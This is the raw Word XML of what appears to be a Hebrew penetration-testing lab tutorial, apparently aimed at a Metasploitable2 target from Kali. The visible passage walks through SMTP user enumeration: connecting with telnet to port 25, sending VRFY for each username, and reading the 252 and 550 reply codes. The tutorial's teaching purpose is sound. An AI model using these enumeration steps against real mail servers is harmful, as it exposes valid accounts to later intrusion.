          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3B0206" w14:textId="352D1E63" w:rsidR="0016437C" w:rsidRPr="007D51BF" w:rsidRDefault="0016437C" w:rsidP="0016437C">
      <w:pPr>
        <w:jc w:val="right"/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קובץ משתמשים לבדיקה -</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>U</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF38240" w14:textId="2C02DE45" w:rsidR="0016437C" w:rsidRPr="007D51BF" w:rsidRDefault="0016437C" w:rsidP="0016437C">
      <w:pPr>
        <w:jc w:val="right"/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t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>כתובת המארח -</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2076F009" w14:textId="0515BBDC" w:rsidR="0016437C" w:rsidRPr="007D51BF" w:rsidRDefault="00152E68" w:rsidP="0016437C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59968" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3011CC4E" wp14:editId="3D49FA7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637020" cy="5935980"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:wrapNone/>
            <wp:docPr id="119" name="תמונה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55582" w14:textId="77777777" w:rsidR="00A26482" w:rsidRPr="007D51BF" w:rsidRDefault="00A26482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6C64CE36" w14:textId="77777777" w:rsidR="00A26482" w:rsidRPr="007D51BF" w:rsidRDefault="00A26482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48201537" w14:textId="77777777" w:rsidR="00A26482" w:rsidRPr="007D51BF" w:rsidRDefault="00A26482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0E16ABCB" w14:textId="77777777" w:rsidR="00A26482" w:rsidRPr="007D51BF" w:rsidRDefault="00A26482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4245184B" w14:textId="77777777" w:rsidR="00A26482" w:rsidRPr="007D51BF" w:rsidRDefault="00A26482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76F36A87" w14:textId="77777777" w:rsidR="00A26482" w:rsidRPr="007D51BF" w:rsidRDefault="00A26482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12488E4C" w14:textId="77777777" w:rsidR="00A26482" w:rsidRPr="007D51BF" w:rsidRDefault="00A26482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63CE7940" w14:textId="77777777" w:rsidR="00A26482" w:rsidRPr="007D51BF" w:rsidRDefault="00A26482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5B3888F9" w14:textId="77777777" w:rsidR="00A26482" w:rsidRPr="007D51BF" w:rsidRDefault="00A26482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450A373F" w14:textId="77777777" w:rsidR="00A26482" w:rsidRPr="007D51BF" w:rsidRDefault="00A26482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09B2A430" w14:textId="77777777" w:rsidR="00A26482" w:rsidRPr="007D51BF" w:rsidRDefault="00A26482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3F4B3531" w14:textId="77777777" w:rsidR="00A26482" w:rsidRPr="007D51BF" w:rsidRDefault="00A26482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33FD2E9B" w14:textId="77777777" w:rsidR="00A26482" w:rsidRPr="007D51BF" w:rsidRDefault="00A26482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5DBD29D1" w14:textId="77777777" w:rsidR="00A26482" w:rsidRPr="007D51BF" w:rsidRDefault="00A26482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6161D55D" w14:textId="51CF2EB7" w:rsidR="00A26482" w:rsidRPr="007D51BF" w:rsidRDefault="0016437C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ניתן להשתמש במספר קבצי משתמשים המוגדרים </w:t>
      </w:r>
      <w:r w:rsidR="00152E68" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>ב</w:t>
      </w:r>
      <w:r w:rsidR="00152E68" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">kali </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3C917A" w14:textId="00C1A952" w:rsidR="00A26482" w:rsidRPr="007D51BF" w:rsidRDefault="00A26482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49F2B8A2" w14:textId="77777777" w:rsidR="00A26482" w:rsidRPr="007D51BF" w:rsidRDefault="00A26482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034BA5D3" w14:textId="77777777" w:rsidR="00A26482" w:rsidRPr="007D51BF" w:rsidRDefault="00A26482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1756A8A2" w14:textId="65CCD1F3" w:rsidR="00A26482" w:rsidRPr="007D51BF" w:rsidRDefault="00A26482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7D9F3DED" w14:textId="6117A774" w:rsidR="00152E68" w:rsidRPr="007D51BF" w:rsidRDefault="00152E6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637FFECE" w14:textId="405F13BB" w:rsidR="00152E68" w:rsidRPr="007D51BF" w:rsidRDefault="00152E6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1A84C02E" w14:textId="71CD76FB" w:rsidR="00152E68" w:rsidRPr="007D51BF" w:rsidRDefault="00152E6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725A65F4" w14:textId="11063BB4" w:rsidR="00152E68" w:rsidRPr="007D51BF" w:rsidRDefault="00152E6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372D17D2" w14:textId="57F7AC4E" w:rsidR="00152E68" w:rsidRPr="007D51BF" w:rsidRDefault="00152E6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5399FE15" w14:textId="55B54BFC" w:rsidR="00152E68" w:rsidRPr="007D51BF" w:rsidRDefault="00152E6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2730F304" w14:textId="1BE7AC95" w:rsidR="00152E68" w:rsidRPr="007D51BF" w:rsidRDefault="00152E6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21D49896" w14:textId="73EE7EC4" w:rsidR="00152E68" w:rsidRPr="007D51BF" w:rsidRDefault="00152E6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2A2E7FBE" w14:textId="77777777" w:rsidR="00152E68" w:rsidRPr="007D51BF" w:rsidRDefault="00152E6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3C5B5921" w14:textId="5A19C885" w:rsidR="0049491F" w:rsidRPr="007D51BF" w:rsidRDefault="0049491F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lastRenderedPageBreak/>
        <w:t xml:space="preserve">עכשיו אפשר לנסות לאמת את שמות המשתמשים מול השרת </w:t>
      </w:r>
      <w:r w:rsidR="0040207F" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">באמצעות הפקודה </w:t>
      </w:r>
      <w:r w:rsidR="0040207F" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>VRFY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A93CA2D" w14:textId="3B191CD6" w:rsidR="009907DE" w:rsidRPr="007D51BF" w:rsidRDefault="009907DE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הפקודה מב</w:t>
      </w:r>
      <w:r w:rsidR="003E463E" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>צעת את אימות המשתמש מול השרת</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6837FD82" w14:textId="0514666B" w:rsidR="0040207F" w:rsidRPr="007D51BF" w:rsidRDefault="0040207F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תחילה נתחבר ב</w:t>
      </w:r>
      <w:r w:rsidR="00152E68" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>telnet/nc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לשרת ה</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">smtp 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בפורט 25</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F03095" w14:textId="4260FA22" w:rsidR="0040207F" w:rsidRPr="007D51BF" w:rsidRDefault="0040207F" w:rsidP="0054583A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56896" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3CB877E8" wp14:editId="52CAEF7D">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>233679</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4084320" cy="1149865"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="93" name="תמונה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4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הפקודה </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>telnet 192.168.1.161 25</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CBFBCE" w14:textId="4E525FC8" w:rsidR="0049491F" w:rsidRPr="007D51BF" w:rsidRDefault="0049491F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49315F89" w14:textId="062AE97C" w:rsidR="0040207F" w:rsidRPr="007D51BF" w:rsidRDefault="0040207F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374BDDF0" w14:textId="748E1A40" w:rsidR="0040207F" w:rsidRPr="007D51BF" w:rsidRDefault="0040207F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0A91EFD5" w14:textId="1BAA651F" w:rsidR="0040207F" w:rsidRPr="007D51BF" w:rsidRDefault="0040207F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74484A7B" w14:textId="145E3AA3" w:rsidR="0040207F" w:rsidRPr="007D51BF" w:rsidRDefault="0040207F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7DFC2CB1" w14:textId="3BA993F7" w:rsidR="0040207F" w:rsidRPr="007D51BF" w:rsidRDefault="0040207F" w:rsidP="0054583A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 xml:space="preserve">כעת לפני כל שם משתמש יש להקליד את הפקודה </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> VRFY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C96F382" w14:textId="24D12E2B" w:rsidR="0040207F" w:rsidRPr="007D51BF" w:rsidRDefault="0040207F" w:rsidP="0054583A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57920" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="338FA259" wp14:editId="07E4E87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376333" cy="1612900"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:wrapNone/>
            <wp:docPr id="113" name="תמונה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33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E3C2D" w14:textId="73B5C8BB" w:rsidR="0040207F" w:rsidRPr="007D51BF" w:rsidRDefault="0040207F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1FE2A90B" w14:textId="3AE7A962" w:rsidR="0040207F" w:rsidRPr="007D51BF" w:rsidRDefault="0040207F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6459F123" w14:textId="6984B211" w:rsidR="0040207F" w:rsidRPr="007D51BF" w:rsidRDefault="0040207F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22B014AA" w14:textId="7FB777D5" w:rsidR="0040207F" w:rsidRPr="007D51BF" w:rsidRDefault="0040207F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C7D16C6" wp14:editId="196FB941">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1295400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>36830</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5264150" cy="177800"/>
                <wp:effectExtent l="19050" t="19050" r="12700" b="12700"/>
                <wp:wrapNone/>
                <wp:docPr id="115" name="מלבן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E046E" id="מלבן 115" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:102pt;margin-top:2.9pt;width:414.5pt;height:1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" filled="f" strokecolor="yellow" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="49EDB93C" w14:textId="3FE81840" w:rsidR="0040207F" w:rsidRPr="007D51BF" w:rsidRDefault="0040207F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6D226236" w14:textId="3D6FF013" w:rsidR="0040207F" w:rsidRPr="007D51BF" w:rsidRDefault="0040207F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חשוב לשים לב לכתוב את השם משתמש</w:t>
      </w:r>
      <w:r w:rsidR="00B06C42" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B06C42" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>בצורה נכונה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אחרת ת</w:t>
      </w:r>
      <w:r w:rsidR="00B06C42" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>ת</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>קבל</w:t>
      </w:r>
      <w:r w:rsidR="00B06C42" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>הודעת שגיאה כמו שמסומן בצהוב.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4628F550" w14:textId="25583A6C" w:rsidR="0040207F" w:rsidRPr="007D51BF" w:rsidRDefault="0040207F" w:rsidP="0054583A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"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על יד כל שם משתמ</w:t>
      </w:r>
      <w:r w:rsidR="00B06C42" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>ש יוצג</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> קוד </w:t>
      </w:r>
      <w:r w:rsidR="00247845" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">מסויים. ישנם מספר סוגים של קודים </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519A496E" w14:textId="400F60EE" w:rsidR="001A14E8" w:rsidRPr="007D51BF" w:rsidRDefault="001A14E8" w:rsidP="001A14E8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</w:rPr>
        <w:t>252</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>- מעיד שהשרת קיבל את הבקשה וחשבון המשתמש תקף.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48AD912C" w14:textId="290662E1" w:rsidR="001A14E8" w:rsidRPr="007D51BF" w:rsidRDefault="001A14E8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550- מעיד על כך שמשתמש לא קיים.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750C1219" w14:textId="5927B889" w:rsidR="001A14E8" w:rsidRPr="007D51BF" w:rsidRDefault="001A14E8" w:rsidP="0054583A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>הצגתי את מה שמופיע בתמונה למעלה אך ניתן לקרוא על שאר הקודים פה:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFB5077" w14:textId="70ECE2A9" w:rsidR="001A14E8" w:rsidRPr="007D51BF" w:rsidRDefault="009F468F" w:rsidP="001A14E8">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId120" w:history="1">
        <w:r w:rsidR="001A14E8" w:rsidRPr="007D51BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
            <w:noProof/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://en.wikipedia.org/wiki/L</w:t>
        </w:r>
        <w:r w:rsidR="001A14E8" w:rsidRPr="007D51BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
            <w:noProof/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>ist_of_SMTP_server_return_codes</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5C35A404" w14:textId="77777777" w:rsidR="001A14E8" w:rsidRPr="007D51BF" w:rsidRDefault="001A14E8" w:rsidP="0054583A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="465E0315" w14:textId="1A002328" w:rsidR="0040207F" w:rsidRPr="007D51BF" w:rsidRDefault="0040207F" w:rsidP="0054583A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi" w:hint="cs"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12516F4E" w14:textId="77777777" w:rsidR="001A14E8" w:rsidRPr="007D51BF" w:rsidRDefault="001A14E8" w:rsidP="0054583A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="001A14E8" w:rsidRPr="007D51BF" w:rsidSect="00BD79F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CE1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="75C6C14E"/>
    <w:lvl w:ilvl="0" w:tplc="B0A6596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E28DA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="234EC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19"/>
    <w:rsid w:val="00000224"/>
    <w:rsid w:val="00021151"/>
    <w:rsid w:val="0002686C"/>
    <w:rsid w:val="0005369A"/>
    <w:rsid w:val="000552B9"/>
    <w:rsid w:val="000607CB"/>
    <w:rsid w:val="00083F15"/>
    <w:rsid w:val="00097503"/>
    <w:rsid w:val="000B193E"/>
    <w:rsid w:val="000B2FCC"/>
    <w:rsid w:val="00152E68"/>
    <w:rsid w:val="00156A77"/>
    <w:rsid w:val="0016437C"/>
    <w:rsid w:val="0017622E"/>
    <w:rsid w:val="00186D5C"/>
    <w:rsid w:val="00195D38"/>
    <w:rsid w:val="001A14E8"/>
    <w:rsid w:val="001A2FFE"/>
    <w:rsid w:val="001E7C1B"/>
    <w:rsid w:val="001F7164"/>
    <w:rsid w:val="00200ADB"/>
    <w:rsid w:val="00211F0E"/>
    <w:rsid w:val="002315A8"/>
    <w:rsid w:val="0023555F"/>
    <w:rsid w:val="00247845"/>
    <w:rsid w:val="00274928"/>
    <w:rsid w:val="002852AE"/>
    <w:rsid w:val="002C1019"/>
    <w:rsid w:val="002D3EE9"/>
    <w:rsid w:val="002F19A7"/>
    <w:rsid w:val="00302563"/>
    <w:rsid w:val="00352C58"/>
    <w:rsid w:val="00367A6B"/>
    <w:rsid w:val="003802AB"/>
    <w:rsid w:val="00391A9E"/>
    <w:rsid w:val="00393945"/>
    <w:rsid w:val="003B08C3"/>
    <w:rsid w:val="003B3972"/>
    <w:rsid w:val="003B50E6"/>
    <w:rsid w:val="003C6D9A"/>
    <w:rsid w:val="003D09BE"/>
    <w:rsid w:val="003E463E"/>
    <w:rsid w:val="0040207F"/>
    <w:rsid w:val="00415CC6"/>
    <w:rsid w:val="00417681"/>
    <w:rsid w:val="00417825"/>
    <w:rsid w:val="004256C9"/>
    <w:rsid w:val="004371D3"/>
    <w:rsid w:val="00440916"/>
    <w:rsid w:val="00467196"/>
    <w:rsid w:val="00487B6C"/>
    <w:rsid w:val="0049491F"/>
    <w:rsid w:val="00497E2B"/>
    <w:rsid w:val="00506029"/>
    <w:rsid w:val="00524609"/>
    <w:rsid w:val="0054583A"/>
    <w:rsid w:val="00555139"/>
    <w:rsid w:val="00566C75"/>
    <w:rsid w:val="00576293"/>
    <w:rsid w:val="00582E1B"/>
    <w:rsid w:val="00596924"/>
    <w:rsid w:val="005A7D0E"/>
    <w:rsid w:val="005B195E"/>
    <w:rsid w:val="005F4A0A"/>
    <w:rsid w:val="006042E0"/>
    <w:rsid w:val="006054F9"/>
    <w:rsid w:val="006350E9"/>
    <w:rsid w:val="00654EEA"/>
    <w:rsid w:val="00672E52"/>
    <w:rsid w:val="00687815"/>
    <w:rsid w:val="006B6C9F"/>
    <w:rsid w:val="006C0F15"/>
    <w:rsid w:val="006C7127"/>
    <w:rsid w:val="006E4532"/>
    <w:rsid w:val="006E68E4"/>
    <w:rsid w:val="0070581B"/>
    <w:rsid w:val="00716EB9"/>
    <w:rsid w:val="007214E0"/>
    <w:rsid w:val="00731994"/>
    <w:rsid w:val="00734358"/>
    <w:rsid w:val="007577A8"/>
    <w:rsid w:val="00790451"/>
    <w:rsid w:val="007B3A24"/>
    <w:rsid w:val="007D51BF"/>
    <w:rsid w:val="007E57B1"/>
    <w:rsid w:val="007F3A29"/>
    <w:rsid w:val="00806FF4"/>
    <w:rsid w:val="0080744C"/>
    <w:rsid w:val="00825A1F"/>
    <w:rsid w:val="00831D32"/>
    <w:rsid w:val="00880BC4"/>
    <w:rsid w:val="008E32B3"/>
    <w:rsid w:val="0090322B"/>
    <w:rsid w:val="009048D1"/>
    <w:rsid w:val="0090536E"/>
    <w:rsid w:val="0091223B"/>
    <w:rsid w:val="00931C77"/>
    <w:rsid w:val="009425BF"/>
    <w:rsid w:val="009445BF"/>
    <w:rsid w:val="0095077F"/>
    <w:rsid w:val="009907DE"/>
    <w:rsid w:val="009D3A4F"/>
    <w:rsid w:val="009E0F91"/>
    <w:rsid w:val="009E4DD6"/>
    <w:rsid w:val="009F2D28"/>
    <w:rsid w:val="009F468F"/>
    <w:rsid w:val="00A26482"/>
    <w:rsid w:val="00A57DE4"/>
    <w:rsid w:val="00A62956"/>
    <w:rsid w:val="00A7331A"/>
    <w:rsid w:val="00AA5BFD"/>
    <w:rsid w:val="00AB5A8C"/>
    <w:rsid w:val="00AD6CE6"/>
    <w:rsid w:val="00AF2C5B"/>
    <w:rsid w:val="00B06C42"/>
    <w:rsid w:val="00B20D4F"/>
    <w:rsid w:val="00B21E58"/>
    <w:rsid w:val="00B346BA"/>
    <w:rsid w:val="00B81228"/>
    <w:rsid w:val="00B845D5"/>
    <w:rsid w:val="00BA14D3"/>
    <w:rsid w:val="00BB2F09"/>
    <w:rsid w:val="00BC1668"/>
    <w:rsid w:val="00BC7A6B"/>
    <w:rsid w:val="00BD79F5"/>
    <w:rsid w:val="00BF7960"/>
    <w:rsid w:val="00C0132C"/>
    <w:rsid w:val="00C04C55"/>
    <w:rsid w:val="00C04EBA"/>
    <w:rsid w:val="00C12BB1"/>
    <w:rsid w:val="00C21063"/>
    <w:rsid w:val="00C5490F"/>
    <w:rsid w:val="00C7533D"/>
    <w:rsid w:val="00C87DCD"/>
    <w:rsid w:val="00CC5F09"/>
    <w:rsid w:val="00CC6D21"/>
    <w:rsid w:val="00CE457A"/>
    <w:rsid w:val="00D11A12"/>
    <w:rsid w:val="00D4531B"/>
    <w:rsid w:val="00D5647C"/>
    <w:rsid w:val="00D621F1"/>
    <w:rsid w:val="00D63D45"/>
    <w:rsid w:val="00D732F6"/>
    <w:rsid w:val="00D85FB9"/>
    <w:rsid w:val="00D93679"/>
    <w:rsid w:val="00DA3390"/>
    <w:rsid w:val="00DC4D44"/>
    <w:rsid w:val="00DC7F44"/>
    <w:rsid w:val="00DD016B"/>
    <w:rsid w:val="00E07CEB"/>
    <w:rsid w:val="00E223DF"/>
    <w:rsid w:val="00E265DA"/>
    <w:rsid w:val="00E305DD"/>
    <w:rsid w:val="00E43373"/>
    <w:rsid w:val="00E54172"/>
    <w:rsid w:val="00E6416D"/>
    <w:rsid w:val="00E667FB"/>
    <w:rsid w:val="00E76317"/>
    <w:rsid w:val="00E84A07"/>
    <w:rsid w:val="00EA460A"/>
    <w:rsid w:val="00EC0D0A"/>
    <w:rsid w:val="00ED3E78"/>
    <w:rsid w:val="00F143D6"/>
    <w:rsid w:val="00F16EE2"/>
    <w:rsid w:val="00F1790D"/>
    <w:rsid w:val="00F214B6"/>
    <w:rsid w:val="00F23AA6"/>
    <w:rsid w:val="00F30C90"/>
    <w:rsid w:val="00F327BB"/>
    <w:rsid w:val="00F654FA"/>
    <w:rsid w:val="00F66138"/>
    <w:rsid w:val="00F77F4F"/>
    <w:rsid w:val="00F81980"/>
    <w:rsid w:val="00F832AF"/>
    <w:rsid w:val="00FA76D6"/>
    <w:rsid w:val="00FB6AB9"/>
    <w:rsid w:val="00FC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A9172"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{8E07426E-DDE9-48A1-9198-60A3DFFF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2C101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2C101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semiHidden/>
    <w:rsid w:val="002C10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2C101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4337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43373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43373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3B39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hyperlink" Target="https://www.serv-u.com/linux-ftp-server/commands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" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sourceforge.net/projects/metasploitable/files/Metasploitable2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hyperlink" Target="https://cdimage.kali.org/kali-2020.4" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 